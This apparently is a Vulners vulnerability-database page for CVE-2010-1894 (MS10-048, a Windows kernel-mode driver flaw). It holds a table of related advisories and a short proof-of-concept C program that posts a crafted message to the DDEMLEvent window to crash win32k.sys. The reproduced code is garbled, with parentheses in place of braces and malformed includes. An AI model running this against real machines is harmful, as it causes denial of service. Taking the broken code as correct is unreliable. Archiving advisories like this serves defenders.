| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2010-1894 | 11 Aug 201018:00 | – | cve | |
| CVE-2010-1894 | 11 Aug 201018:00 | – | cvelist | |
| EUVD-2010-1913 | 7 Oct 202500:30 | – | euvd | |
| CVE-2010-1894 | 11 Aug 201018:47 | – | nvd | |
| Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) | 11 Aug 201000:00 | – | openvas | |
| Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) | 11 Aug 201000:00 | – | openvas | |
| Privilege escalation | 11 Aug 201018:47 | – | prion | |
| Microsoft Security Bulletin MS10-048 - Important Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2160329) | 11 Aug 201000:00 | – | securityvulns | |
| Microsoft Windows kernel multiple security vulnerabilities | 11 Aug 201000:00 | – | securityvulns | |
| MS10-048: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2160329) | 11 Aug 201000:00 | – | nessus |
`# Source: http://www.securityfocus.com/bid/39630/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue.
# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\[email protected]\nPressEnter");
getchar();
HWND hwnd = FindWindow ("DDEMLEvent", NULL);
if (hwnd == 0)
(
printf ("cannot find DDEMLEvent Window! \ n");
return 0;
)
PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
return 0;
)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation